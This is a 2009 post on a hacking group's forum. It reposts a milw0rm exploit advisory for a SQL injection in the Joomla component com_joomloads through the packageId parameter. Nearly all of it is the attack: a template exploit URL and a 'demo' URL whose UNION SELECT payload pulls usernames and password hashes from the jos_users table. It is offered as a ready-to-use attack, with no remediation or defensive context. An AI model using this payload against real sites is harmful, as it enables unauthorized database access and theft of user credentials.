Multi Ethnic Hacking Group


    Joomla Component com_joomloads (packageId) SQL Injection Vuln

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    Joomla Component com_joomloads (packageId) SQL Injection Vuln

    Post by Foxi on Sat Jul 25, 2009 11:41 am

    Code:
    =======================================================
    +++++++++++++++++++ information +++++++++++++++++++++++
    =======================================================
    [+] script : Joomla Component com_joomloads (packageId) Remote SQL Injection Vuln

    [+] Found by : Mr.tro0oqy 
     
    [+] C0ntact : t.4@windowslive.com <Yemeni ana>
    =======================================================
    +++++++++++++++++++++++ Exploit +++++++++++++++++++++++
    =======================================================
    exploit:
    --------
    http://localhost/path/index.php?option=com_joomloads&view=package&Itemid=2&packageId=<SQL CODE>



    demo:
    -----
    http://www.xxx.com/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--

    # milw0rm.com [2009-07-23]


      Current date/time is Sun May 28, 2017 10:18 pm